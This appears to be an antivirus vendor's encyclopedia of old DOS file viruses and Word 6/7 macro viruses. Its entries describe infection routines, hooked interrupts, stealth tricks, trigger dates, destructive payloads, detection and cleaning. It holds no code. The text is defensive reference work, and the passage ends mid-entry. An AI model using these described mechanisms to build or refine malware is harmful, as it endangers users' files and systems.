Virus Type: File Virus (COM files) Virus Length: 613 bytes Execution Procedure: 1) Infects all COM files on the current directory (It does not infect the same file again). 2) Checks whether the current day is Sunday. If it is, it displays a message and waits until a key is pressed. 3) Changes the word at address 4000:0013h of RAM to 0200h. 4) Calls INT 19h to reboot the system. Damage: None Note: 1) Date and time fields of infected files are not changed. 2) Infected files increase from 613-628 bytes. [Fri-13D] Virus Name: Fri-13-D Virus Type: File Virus (COM files) Virus Length: 416 bytes Execution Procedure: 1) When an infected program is executed, it will infect all COM files (except COMMAND.COM) on the current directory (it does not infect the same file again). 2) Checks whether the current day is Friday the 13th. If it is, it deletes itself and then goes back to the original routine. Damage: An infected program will delete itself if you run it on Friday the 13th. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase from 416-431 bytes. [Ash] Virus Name: Ash Virus Type: File Virus (COM files) Virus Length: 280 bytes Execution Procedure: Infects all infectable COM files on the current directory (It does not infect the same file again, and does not infect files larger than 64768). If the number of newly infected files is less than 2, it will search for infectable files on its father and father's father directory. Damage: None Detection Method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 280 bytes. [Bljec-1] Virus Name: Bljec-1 Virus Type: File Virus (COM files) Virus Length: 301 bytes Execution Procedure: Checks whether the current month is September. If it is, it will format the first 16 sectors of the current diskette, then infects all COM files on the current directory. Damage: Formats the first 16 sectors of the current diskette if the current month is September. Detection Method: 1) Date and time fields of infected files are not changed. 2) Infected files increase by 301 bytes. [Cas-927] Virus Name: Cas-927 Virus Type: Memory Resident(HiMem), File Virus (COM files) Virus Length: 3+927 bytes PC Vectors Hooked: INT 21h, 1Ch, 28h Execution Procedure: 1) The virus decodes. 2) Checks whether it has stayed resident in the memory. If not, it loads itself resident in the high memory. 3) Hooks INT 21h, INT 1Ch and INT 28h and goes back to the original routine. Infection Procedure: INT 21h: 1) Hooks INT 21h to check whether it has stayed resident in the memory. 2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be executed is an uninfected COM file and its length is not larger than 63500 bytes, the virus infects it. INT 28h: Hooks INT 28h to check whether the current month is an even month, current day is Sunday, Tuesday, Thursday, or Saturday, and current time is 11:11:11. If all these conditions are satisfied, it sets a damage_flag to be used later by INT 1Ch. INT 1Ch: Hooks INT 1Ch to cooperate with INT 28h. If the damage_flag is set, it changes all uppercase characters on the screen to lowercase. Damage: None Note: 1) The virus stays resident in the high memory (it uses 7A pares). 2) Infected files increase by 855 bytes. 3) Date and time fields of infected files are not changed. [CSFK] Virus Name: Csfk Virus Type: Memory Resident(MCB), File Virus (COM files) Virus Length: 5+918 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) The virus decodes. 2) Checks whether it has stayed resident in the memory. If not, it loads itself memory resident. 3) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21h to check whether it has stayed resident in the memory. 2) Hooks INT 21(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file and its length is between 25 bytes and 63500 bytes, the virus infects it. Damage: None Note: 1) The virus stays resident in the memory (MCB) (it uses 6A pares). 2) Infected files increase by 918 bytes. 3) Date and time fields of infected files are not changed. [Warrier1] Virus Name: Warrier1 Virus Type: Memory Resident(HiMem), File Virus (COM files) Virus Length: 300 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) The virus decodes. 2) Checks whether it has stayed resident in the memory. If not, it loads itself memory resident. 3) Hooks INT21h and goes back to the original routine. Infection Procedure: Hooks INT 21h(AX=4B00h) to infect files. If the program to be executed is an uninfected COM file (except COMMAND.COM), the virus infects it. Damage: None Note: 1) The virus stays resident in the high memory (it uses 61 pares). 2) Date and time fields of infected files are not changed. 3) The change in the infected file's length varies depending on the following: i) If the original file is not larger than 768 bytes, its infected version will be 1536 bytes long. ii) If the original file is larger than 768 bytes, its infected version will increase by 768 bytes. Cleaning Method: Delete the first 768 bytes from infected files. [Athens] Virus Name: Athens Virus Type: Memory Resident(HiMem), File Virus (COM and EXE files) Virus Length: 1,463 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) The virus decodes. 2) Checks whether it has stayed resident in the memory. If not, it loads itself resident in the high memory. 3) Hooks INT21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21h to check whether it has stayed resident in the memory. 2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be executed is an uninfected EXE or COM (except COMMAND.COM) file, the virus infects it. 3) Hooks INT 21h (AX=4Eh,4Fh,11h,12h) to check whether the current program has been infected. If it is, the virus changes the file's length and date in DTA to their original data. This prevents users from noticing the change in the length and date of infected files while the virus is memory resident. Damage: None Note: 1) The virus stays resident in the high memory (it uses DFh pares). 2) Infected files increase by 1463 bytes. You can not see the increase while the virus is memory resident. 3) Date and time fields of infected files are changed. You can not see this while the virus is memory resident. [Commy] Virus Name: Commy Virus Type: File Virus (COM files) Virus Length: 998 bytes Execution Procedure: 1) The virus decodes. 2) Checks whether the current minute is less than 10, and the current DOS version is above 3.0. If all these conditions are satisfied, it will search for a COM file with length between 4567 bytes and 64520 bytes, and infects it (the virus infects one file at a time). 3) It goes back to the original routine. The search path is the value specified by PATH. When the virus infects a file, it encodes the file's time to verify it is infected. Damage: None Note: 1) Infected files increase by 998 bytes. 2) The dates of infected files are not changed. 3) The time fields of infected files are changed due to the encoding. [Arriba] Virus Name: Arriba Virus Type: Memory resident, File Virus (COM and EXE files) Virus Length: 1,590 bytes PC Vectors Hooked: INT 21h, INT 08h Execution Procedure: 1) Checks whether it has stayed resident in the memory. If it has, it will go back to the original routine directly. Otherwise, it will move itself to high memory. 2) Hooks INT21h and checks whether the current date is November 20. If it is, it hooks INT 08h and goes back to the original routine. Infection Procedure: Hooks INT 08h to display a message and then halt the system. Hooks INT 21h(AX=4B00) to check whether the program being executed is infected. If not, the virus will infect it in different ways according to its type: if it is a COM file, it will write the virus code at the beginning of the original file, followed by the original file's code, and attach two bytes of identified code at the end of the file to verify that this file is already infected; if it is an EXE file, it will attach the virus code at the end of the original file's code, then change the head of file and attach the identified code at the end. Damage: Halts the system when INT 08h is called. Note: 1) The date and time fields of infected files are not changed. 2) The method the virus uses to move the code is special. First, it tests whether the address A0000h is writable. If not, it moves 1000 bytes of this area to a lower address repeatedly until it finds a writable area. Then it moves the virus codes into this area. You will not notice the changes in the memory by MEM program because it has not changed the size of the memory blocks. This method may cause damage to the virus code, and may even halt the system. Detection method: Infected files increase by 1590 bytes. [Ekoterror] Virus Name: Ekoterror Virus Type: Memory Resident(HiMem), File Virus, Partition Virus Virus Length: 2,048 bytes PC Vectors Hooked: INT 08h, 13h, 21h Execution Procedure: 1) When an infected program is executed, the virus writes its viral code to the Partition. The virus will not check whether the Partition is already infected or not, thus executing an infected file several times will delete all data in the Partition. 2) Hooks INT 08h, INT 13h, and call INT 08h to check whether DOS has been loaded. If it has, it hooks INT 21h. Infection Procedure: Hooks INT 08h to check whether DOS has been loaded. If it has, it hooks INT 21h. Hooks INT 13h to check whether the sector loaded is the Partition. If it is, it will revert back or change the data of the original Partition. Hooks INT 21h to infect COM files when reading or writing files. Damage: The virus deletes the data in the Partition after executing an infected file several times. Note: 1) If the virus has invaded the Partition, you will not be able to load or save data onto the hard disk if you booted the system from a diskette. This is because the data in the Partition has already changed. 2) If the DOS version is not suitable, or the INT 08h code does not conform to the DOS loading process, the virus can not hook INT 21. This prevents the virus from infecting files. Cleaning Method: Boot up from an uninfected diskette. Then use a program that can read or write data on the hard disk (like Debug) to write the data of the original Partition back (The virus moves the data of the original Partition to 0 side, 0 track, 5 sector. Every time it is infected, it will add 4 to the number of sectors). [AST-976] Virus Name: Ast-976 Virus Type: Memory Resident, File Virus (COM files) Virus Length: 976 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) The virus decodes. 2) Checks whether it is resident in the memory. If not, it loads itself resident in the high memory. 3) Hooks INT 21h and infects all COM files on the current directory (it does not infect the same file again). 4) Checks whether the current minute is 17. If it is, it makes some modifications on the Partition to keep the system from booting correctly. Infection Procedure: 1) Hooks INT 21h to check whether it is memory resident. 2) Hooks INT 21(AX=4B00h) to infect files. If the program to be executed is an uninfected COM file, the virus infects it. Damage: When the virus activates, it makes the screen flash once. Then it changes data in the Partition. The change is achieved by XORing every fourth byte of the four Partition records with 55 (there are four Partition records in the Partition table). Note: The date and time fields of infected files are not changed. Detection method: Infected files increase by 976 bytes. [AST-1010] Virus Name: Ast-1010 Virus Type: Memory Resident, File Virus (COM and EXE files) Virus Length: 1,010 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) The virus decodes. 2) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 3) Hooks INT21h and infects all COM and EXE files on the current directory (it does not infect the same file again). 4) Checks whether the current day is the 16th. If it is, it makes changes to the Partition to keep the system from booting correctly. Infection Procedure: 1) Hooks INT 21h to check whether it is memory resident. 2) Hooks INT 21(AX=4B00h) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus infects it. Damage: When the virus activates, it makes the screen flash once. Then it modifies the Partition. The change is achieved by XORing every fourth byte of four Partition records with 55 (there are four Partition records in the partition table). Note: 1) Date and time fields of infected files are not changed. 2) The method of checking whether the virus is memory resident is the same as the AST-976 virus. Thus, these two viruses can not stay memory resident at the same time. Detection method: Infected files increase by 1010 bytes. [Filler] Virus Name: Filler Virus Type: File Virus Execution Procedure: When an infected file is executed, the virus writes some garbage information into some sectors on the floppy inserted in the A drive. Damage: Destroys some sectors in the diskette inserted in the A drive (starts from 0 side, 28 track, 1 sectors, damages 8 sectors). [Path] Virus Name: Path Virus Type: File Virus (COM files) Virus Length: 3+906 bytes Execution Procedure: 1) Decodes its later half. 2) Checks for other infected files. If there is, it only infects one program. Otherwise, it goes back to run the original routine. The search path is the path set in PATH. The condition for the infectable file is that it must be an uninfected COM file with length between 10 bytes and 64000 bytes. Damage: None Note: 1) Does not stay resident in memory. 2) Date and time fields of infected files are not changed. 3) Infected files increase by 906+G bytes (0<=G<=247). [Flower] Virus Name: Flower Virus Type: File Virus (EXE files) Virus Length: 883 bytes Execution Procedure: 1) Decodes its encoded section. 2) Checks whether the current date is November 11, or whether the virus version is not less than 174. If one of these conditions is satisfied, the virus destroys the original program (Document) and goes back to run the original routine. Otherwise, it searches for the first uninfected file on the current directory and infects it. Then it searches for the first uninfected file on the subdirectory under the root directory and infects it. 3) Goes back to run the original routine. Every infected file has its own number. When it infects a file, it increases the current number by 1. This number will be delivered to the next infection process. Damage: When the virus activates, the virus attaches a procedure to the original procedure to display a message (An English poem whose title is "FLOWER"). Then it destroys the original procedure by overwriting its front data. Note: Date fields of infected files are not changed; however, the time fields are changed due to the encoding of the time fields. [Grunt-3] Virus Name: Grunt-3 Virus Type: File Virus (COM files) Virus Length: 3+473 bytes Execution Procedure: 1) Decodes its later half section. 2) Checks if there is an uninfected COM or EXE file on the current and all father directories. If there is, it checks whether the current year is not less than 1993 and it is Friday. If it is, it does not infect any files except for displaying the following: "This is a hot LZ ...Eradicating the Enemy!". Otherwise, the virus infects it (it only infects one file at a time). Damage: None Note: 1) Does not stay resident in memory. 2) Date and time fields of infected files are not changed. Detection method: Infected files increase by 473 bytes. [Ultrasik-1967] Virus Name: Ultrasik-1967 Virus Type: File Virus (EXE files) Virus Length: 1967 bytes Execution Procedure: Searches for an uninfected EXE file and infects it. The searching path is from the current directory to its subdirectory, to subdirectories under the last subdirectory, to the root directory, to subdirectories under the root directory. After that, it goes back to the original routine. If there is no infectable file, it halts the system (the original plan is to format C. But it instead halts the system due to a bad instruction in the viral code). Damage: None Note: Date and time fields of infected files are not changed. Detection method: 1) Infected files will increase. 2) The algorithm is: First, add original length to let it become a multiple of 16. Then increases it by 1967 bytes. [Madden] Virus Name: Madden Virus Type: File Virus (EXE files) Virus Length: 1988 bytes Execution Procedure: Searches for an uninfected EXE file and infects it. The searching path is from the current directory to its subdirectory, to the subdirectories under the last subdirectory, to the root directory, to the subdirectories under root directory. After that, it goes back to the original routine. If there is no infectable file, the virus issues a strange sound that stops only when the system is rebooted. Damage: None Note: Date and time fields of infected files are not changed. Detection method: 1) Infected files increase. 2) The algorithm is: First add to the original length to let it become a multiple of 16, and then increase it by 1988 bytes. [Madden-B] Virus Name: Madden-B Virus Type: File Virus (EXE files) Virus Length: 1440 bytes Execution Procedure: Searches for an uninfected EXE file and infects it. The searching path is from the current directory to its subdirectory, to the subdirectories under the last subdirectory, to the root directory, to the subdirectories under the root directory. After that, it goes back to the original routine. If there is no infectable file, the virus issues a sound from high to low, from low to high, and so on until the system is rebooted. Damage: None Note: Date and time fields of infected files are not changed. Detection method: 1) Infected files increase in length. 2) The algorithm is: First add original length to let it become a multiple of 16, and then increase it by 1440 bytes. [Prime] Virus Name: Prime Virus Type: File Virus (*.C*; mainly *.COM) Virus Length: 580 bytes PC Vectors Hooked: INT 01h, INT 03h, INT 24h Execution Procedure: 1) It decodes its later half section. 2) Checks whether the current day is 1. If it is, it displays a message and rotates the screen from left to right once. No matter what the day is, it searches for an uninfected file on the current directory and infects it. 3) Then ends. Infection Procedure: 1) Gets the original codes and encodes them with F3h. 2) Gets the system time and encodes it with the virus' later half codes. 3) Attaches virus code to the original file, followed by the original codes. Hooks INT 01h, INT 03h to avoid the Debug program. When this program is executed, it jumps to FE05Bh to reboot the system. Hooks INT 24h to prevent write protection on the current diskette. When INT 24h is called, it halts the system because of a bad viral code. Damage: Original programs are encoded, preventing them to execute after the virus is executed. Note: 1) Does not stay resident in the memory. 2) The virus halts the system when it detects an uninfectable *.C* file on the current directory. 3) Date and time fields of infected files are not changed. Detection method: Infected files increase by 580 bytes. Cleaning Method: Delete the first 580 bytes on infected files. The remaining bytes will XOR with F3h one by one. [PSV-354] Virus Name: Psv-354 Virus Type: File Virus (COM files) Virus Length: 354 bytes Execution Procedure: 1) It decodes its later half section. 2) Checks for uninfected COM files with lengths between 150 bytes and 65000 bytes. If there is/are, only infects one of them. Otherwise, it goes back to run the original routine. Damage: None Note: 1) Does not stay resident in the memory. 2) Date and time fields of infected files are not changed. 3) Does not infect COMMAND.COM of DOS 5.0. Detection method: Infected files increase by 354 bytes. [PCBB] Virus Name: Pcbb Virus Type: Memory resident, File Virus (COM files) Virus Length: 3+(1675-1687) bytes PC Vectors Hooked: INT 09h, INT 1Ch, INT 21h Execution Procedure: 1) It decodes its later half section. 2) Checks whether it is memory resident or not. If not, it loads itself resident into the high memory. 3) Hooks INT 21h,INT 09h,INT 1Ch and goes back to run the original routine. Infection Procedure: Infection occurs when executing a program, copying a file, changing the file's attribute, opening a file, closing a file, or renaming a file (AH=56h). When it infects a file, it checks first for the day of the week and selects the corresponding encoding mode for that day. There are seven possible encoding modes. The virus does not infect the same file, and only infects files with lengths between 16 bytes and 61440 bytes. Symptom: While the virus is activated, the screen goes blank when the total number of keys pressed is equal to 957. After this, the virus resets the counter and restarts all over again. You can press the Alt, Control, Shift left and right together to return the screen to normal operation. Damage: None Note: It stays resident in the memory and uses 4K bytes. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 1675, 1677, 1679, 1679, 1680, 1683, or 1687 bytes depending on the day (from Sunday to Saturday respectively). 3) PCBB attaches itself at the end of infected files. [Comspec] Virus Name: Comspec Virus Type: File Virus Virus Length: 3424 bytes Execution Procedure: 1) Executes COMMAND.COM to create six copies of the virus file using six file names from the C:\DOS directory. These copies are saved in the current directory. If there is no C:\DOS directory, it creates a file named "COMSPEC." Damage: It overwrites six files if it is executed in the C:\DOS directory. Detection method: Length of infected files is 3424. [T-1000] Virus Name: T-1000 Virus Type: File Virus (COM files) Virus Length: 128 bytes Execution Procedure: 1) It decodes its later half section. 2) Infects all COM files in the current directory. Infection Procedure: 1) Gets the system time and encodes it with the original procedure. 2) Overwrites its first 128 bytes by the virus code. If it is less than 128 bytes, it will be 128 bytes after it has been infected. Otherwise, the size will not change. Damage: Overwrites the first 127 bytes of the original file with the virus code, thus corrupting the file. Detection method: Date and time fields of infected files are changed. [Seneca] Virus Name: Seneca Virus Type: File Virus (EXE files) Virus Length: 392 bytes Execution Procedure: The virus gets the system date and time and infects the system depending on the following conditions: (1)Current year is not larger than 1980 and current minute is less than 30, or current year is larger than 1980 and current day is not November 25: It infects all EXE files on the current and all father directories. (2)Current year is not larger than 1980 and current minute is not less than 30: It displays this message: "You shouldn't use your computer so much, it's bad for you and your computer." Then destroys the current diskette. (3)Current year is larger than 1980 and current day is November 25: It displays the following message: "HEY EVERYONE!!!" "Its Seneca's B-Day ! Let's Party!" Then destroys the current diskette. The method of destroying the diskette for (2) and (3) is: Write some data onto the first 255 sectors of the diskette, thus deleting important data on it. Damage: In condition (1), infected files are destroyed because their first 392 bytes are overwritten. In condition (2) and (3), the first 255 sectors of the diskette are overwritten. Note: Date and time fields of infected files are not changed. Detection method: One of the messages above appears on the screen. [WORD_Baby.A] Virus Name: WORD_Baby.A Virus Type: Word Macro Virus Alias: Punten Platform: Word 6/7 Number_of_macros: 10 Encrypted: Yes Size_of_macros: 4322 Bytes Place_of_origin: Unknown Date_of_origin: Spring 1997 Payload: Yes Trigger_date: March 24th, October 15th, 1st, 30th, September 21st Password: None Seen_In_The_Wild: No Seen_where: UK Description: WORD_Baby.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened and saved (FileSave and FileSaveAs). Baby.A uses ToolsMacro and ToolsCustomize to make recognition of an infected document more difficult (called macro stealth technique). When a user selects ToolMacro/ToolsCustomize, the following message is displayed: " 57773LKOM ! " The following messages are displayed when a user exits Microsoft Word: On the 24th of March: " Stop Work Let's Party, this is my Day ! " On the 1st after 3 p.m: " 57773LK0M ! " On the 15th of October: "GiE, You're gettin' Old, Bro !" On the 21st of September: " Cathy, this is your day. Have Fun ! " When a document is printed on the 30th of each month, Baby.A inserts the following text into the active document: " Punten ... " " I Just Wanna Give a Shut Up to @Rapi.Kom: " " Just Don't Make Any Destructive Virus Ok ! " " Insert "We're East-Man Remember ! " " Insert "Peace 2 all My Home-Bro' Out There ! " " Insert "I'm Outta here !! Mangga sadayana... " [WORD_Balu.A] Virus Name: WORD_Balu.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 2 or 1 Encrypted: Yes Size_of_macros: 776 or 646 Bytes Place_of_origin: Germany Date_of_origin: Spring 1997 Payload: Yes Trigger_date: April 5th, April 16th Password: SSichliebeDich, SSICHLIEBEDICH Seen_In_The_Wild: No Seen_where: Description: WORD_Balu does not infect any other documents. It is classified as a trojan horse. Balu only works with the German version of Microsoft Word, since it uses language specific macros. On the 5th of April, Balu renames the following files: " c:\command.com" to "c:\kniffel\com.com " " c:\msdos.sys" to "c:\kniffel\ms.sys " " c:\io.sys" to "c:\kniffel\ii.sys " Balu's second payload adds the following password to saved documents: " SSichliebeDich " " SSICHLIEBEDICH " On the 16th of April, Balu displays the following message: " Dicke aus Schwelm, ich werde Dich immer lieben, weil die Tⁿr " zu meinem Herzen immer fⁿr Dich offen steht, egal was passiert. " " Ich hoffe Du verzeihst mir. " " Dein balu aus Schwelm " [WORD_Barbaro.A:It] Virus Name: WORD_Barbaro.A:It Virus Type: Word Macro Virus Alias: Nostradamus Platform: Word 6/7 Number_of_macros: 3 Encrypted: No Size_of_macros: 2813 Bytes Place_of_origin: Italy Date_of_origin: December 1996 Payload: Yes Trigger_date: 31st Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Barbaro infects the global template when an infected document is opened. Further documents become infected when they are saved (FileSalva). WORD_Barbaro uses StrumMacro to make recognition of an infected document more difficult (called macro stealth technique). On the 31st of each month, Barbaro displays the following message: "Barbaro impero dal terzo sarai soggiogato " "Gran parte d'individui della sua origine farα perire " "Per decesso senile avverrα la sua fine, il quarto colpirα " "Per timore che il sangue con il sangue morte ne derivi. " " NOSTRADAMUS Virus " WORD_Barbaro only works with the Italian version of Microsoft Word, since it uses language specific macros. [WORD_ABC.A] Virus Name: WORD_ABC.A Virus type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 3 Encrypted: Yes Size_of_macros: 1836 (1801) Bytes Place_of_origin: USA Date_of_origin: Fall 1996 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_ABC.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSaveAs). WORD_ABC.A is one of the very few non-destructive macro viruses. It only infects other files and displays the following message: " I am happy; are you too? " When the "Colin" macro triggers, it adds the following text to the File|Properties section of infected documents: " Smash Technology " " Resist Oppression " [WORD_CeeFour.A] Virus Name: WORD_Ceefour.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 6 Encrypted: Yes Size_of_macros: 4062 Bytes Place_of_origin: USA Date_of_origin: Spring 1997 Destructive: Yes Trigger_date: April 1st Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CeeFour.A infects the global template when an infected document is opened. Further documents become infected when they are saved. WORD_CeeFour.A uses ToolsMacro and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). When a user selects on of the two options, CeeFour.A displays the following message: " A serious error has occoured in sub program: MenuBar " When a document is saved on April 1st, CeeFour.A triggers and does the following: 1. LABEL the partition of the first hard drive to " C4_BY_KARL " 2. Delete all files on C:\ 3. Delete C:\COMMAND.COM 4. Delete C:\WINDOWS\WIN.COM The following comments can be found in the CEEFOUR macro: " C-4 By Karl " " You are about to have a very bad day. " " It looks like C4 in the mothers arm. " " We are both professional, This is personal. " " And when Alexander saw the bredth of his domain he wept for there " " were no more worlds to conquer (benefits of a classical education)" " quotes from the masters! " [WORD_CeeFour.B] Virus Name: WORD_Ceefour.B Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 6 Encrypted: Yes Size_of_macros: 4019 Bytes Place_of_origin: UK Date_of_origin: February 1997 Destructive: Yes Trigger_date: April 1st Password: None Seen_In_The_Wild: Yes Seen_where: UK Description: The main difference between this new variant and the previous CeeFour.A virus is that the code has been slightly modified. For more information, please refer to the CeeFour.A virus description. [WORD_Chaka.A] Virus Name: WORD_Chaka.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 1 or 3 Encrypted: No Size_of_macros: 741 (845 or 843) Bytes Place_of_origin: Germany Date_of_origin: Summer 1997 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Chaka.A infects the global template when an infected document is opened. Further documents become infected when they are also opened (FileOpen - DateiOeffnen in the German version of Microsoft Word) or closed (DocClose - DateiSchliessen in the German version of Microsoft Word). WORD_Chaka does not do anything besides infecting other files. [WORD_Chandigarh.A] Virus Name: WORD_Chandigarh.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 1 Encrypted: Yes Size_of_macros: 244 Bytes Place_of_origin: India Date_of_origin: May 1996 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Chandigarh.A infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). WORD_Chandigarh.A does nothing else besides infecting other files. The following comment can be found inside the code of Chandigarh: " This Code was written in Chandigarh (India) on 01.05.1996 " [WORD_Cheat.A] Virus Name: WORD_Cheat.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 1 Encrypted: No Size_of_macros: 249 Bytes Place_of_origin: Unknown Date_of_origin: Summer 1997 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Cheat.A is another intended macro virus. Due to bugs in the code it does not infect other files. [WORD_Cheat.B] Virus Name: WORD_Cheat.B Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 1 Encrypted: No Size_of_macros: 279 Bytes Place_of_origin: Unknown Date_of_origin: Summer 1997 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Cheat.B is another intended macro virus. Due to bugs in the code it does not infect other files. [WORD_Vicis.A] Virus Name: WORD_Vicis.A Virus Type: Word Macro Virus Alias: Vicissitator Platform: Word 6/7 Number_of_macros: 1 or 2 (global template) Encrypted: No Size_of_macros: differs Place_of_origin: Unknown Date_of_origin: July 1997 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Vicis.A infects the global template when an infected document is saved. Further documents become infected when they are also saved (FileSave). WORD_Vicis.A is another polymorphic virus that changes itself. Whenever a user saves a document while the global template (normal.dot) is infected, WORD_Vicis.A calls its mutating code. Due to a bug some variants will fail to infect further files. Executing the corrupted FileSave macro causes Microsoft Word to display an error message. While simple scan string scanners should have no problem detecting Vicis.A, exact CRC scanners will fail to do so. WORD_Vicis.A uses ToolsMacro to make recognition of an infected document more difficult (called macro stealth technique). The following comment can be found within the ToolsMacro macro: " You have been Infected by the Vicissitator Macro Virus. " " (C)1997 CyberYoda A Member of the SLAM Virus Team " WORD_Vicis.A was distributed in July, 1997 in a virus writing magazine. [WORD_Black.A] Virus Name: WORD_Black.A Virus Type: Word Macro Virus Alias: BlackDeath Platform: Word 6/7 Number_of_macros: 3 Encrypted: Yes Size_of_macros: 1355 Bytes Place_of_origin: USA Date_of_origin: June 1997 Destructive: Yes Trigger_date: Friday 13th Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Black infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The following comment can be found in the AutoExec macro: " REM Fuck Micro$oft! " On Friday the 13th Black displays the following message: " Your computer is now lost to the ages... " " WM.BlackDeath " " Written on 6/6/1997 " On the same day, Black deletes the following files: " C:\*.COM " " C:\*.EXE " " C:\WINDOWS\*.INI " " C:\WINDOWS\*.COM " " C:\WINDOWS\*.HLP " " C:\WINDOWS\*.CPL " C:\WINDOWS\*.BMP " " C:\AOL\ORGANIZER\*.* " " C:\AOL\LDB\*.* " [WORD_AntiConcept.A] Virus Name: WORD_AntiConcept.A Virus Type: Word Macro Virus Alias: WORD_Band Number of Variants: 2 Platform: Word 6/7 Number_of_macros: 4 or 3 Encrypted: No Size_of_macros: 1263 (1216) Bytes Place_of_origin: USA Date_of_origin: Summer 1997 Payload: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_AntiConcept.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSave and FileSaveAs). WORD_AntiConcept.A disables the Concept virus by removing some of its macros. When an infected document is opened for the first time, WORD_AntiConcept displays the following message: " Your system may or may not be clean. " " Please close CleanW and then open it again " WORD_AntiConcept.A is an unnatural devolved variant with FileNew missing in its macro set. Due to the missing macro, Microsoft Word displays an error message. [WORD_Band] Virus Name: WORD_Band Virus Type: Word Macro Virus Alias: WORD_AntiConcept.A Number of Variants: 2 Platform: Word 6/7 Number_of_macros: 4 or 3 Encrypted: No Size_of_macros: 1263 (1216) Bytes Place_of_origin: USA Date_of_origin: Summer 1997 Payload: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Band infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSave and FileSaveAs). WORD_Band disables the Concept virus by removing some of its macros. When an infected document is opened for the first time, WORD_Band displays the following message: " Your system may or may not be clean. " " Please close CleanW and then open it again " WORD_Band is an unnatural devolved variant with FileNew missing in its macro set. Due to the missing macro, Microsoft Word displays an error message. [WORD_Archer.A] Virus Name: WORD_Archer.A Virus Type: Word Macro Virus Alias: ArchFiend Platform: Word 6/7 Number_of_macros: 6 Encrypted: No Size_of_macros: 2360 Bytes Place_of_origin: USA Date_of_origin: July 1997 Payload: Yes Trigger_date: 5th Password: Random Seen_In_The_Wild: No Seen_where: Description: WORD_Archer.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened and saved (FileSaveAs). WORD_Archer.A removes FileTemplates and ToolsCustomize to make recognition of an infected document more difficult (called macro stealth technique). When a user selects ToolsMacro, WORD_Archer.A adds the following comment to C:\AUTOEXEC.BAT: " echo BLOW ME! " WORD_Archer.A also checks the system time and in case of a 13 in the seconds field, it adds a password to the saved document. If you find a document with an unknown password, please download a copy of WinWord Password Recovery Tool (wwprt). It is available at: www.vdsarg.com. The second payload, which is triggered on the 5th of each month, tries to delete files on Macintosh systems or delete all bitmap (*.BMP) files in the following directory: " C:\WINDOWS " [WORD_Armadillo.A] Virus Name: WORD_Armadillo.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 4 Encrypted: Yes Size_of_macros: 1265 Bytes Place_of_origin: USA Date_of_origin: Spring 1997 Payload: Yes Trigger_date: Mondays Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Armadillo.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSaveAs). WORD_Armadillo uses ToolsMacro to make recognition of an infected document more difficult (called macro stealth technique). If a user selects ToolsMacro, Armadillo adds the following text 10,000 times to the active document: " Armadillon Macro? " When a user starts Microsoft Word on a Tuesday and the global template is infected, Armadillo displays the following message: " Liven up Monday with an Armadillon! " [WORD_Cult.A] Virus Name: WORD_Cult.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 1 Encrypted: No Size_of_macros: 1688 Bytes Place_of_origin: Germany Date_of_origin: Summer 1997 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Cult.A is another intended macro virus. Due to bugs in the code it does not infect other files. The following comment can be found inside the code: " CULT! Nightmare Joker (SLAM) " [WORD_CVCK1.A] Virus Name: WORD_CVCK1.A Virus Type: Word Macro Virus Alias: Chicken-Pox 0.1 Platform: Word 6/7 Number_of_macros: 11 Encrypted: Yes Size_of_macros: 7315 Bytes Place_of_origin: Indonesia Date_of_origin: 1997 Destructive: No Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CVCK1.A infects the global template when an infected document is closed. Further documents become infected when they are also closed (AutoClose). WORD_CVCK1.A uses ToolsMacro, ToolsCustomize and FileTemplates to make recognition of an infected document more difficult 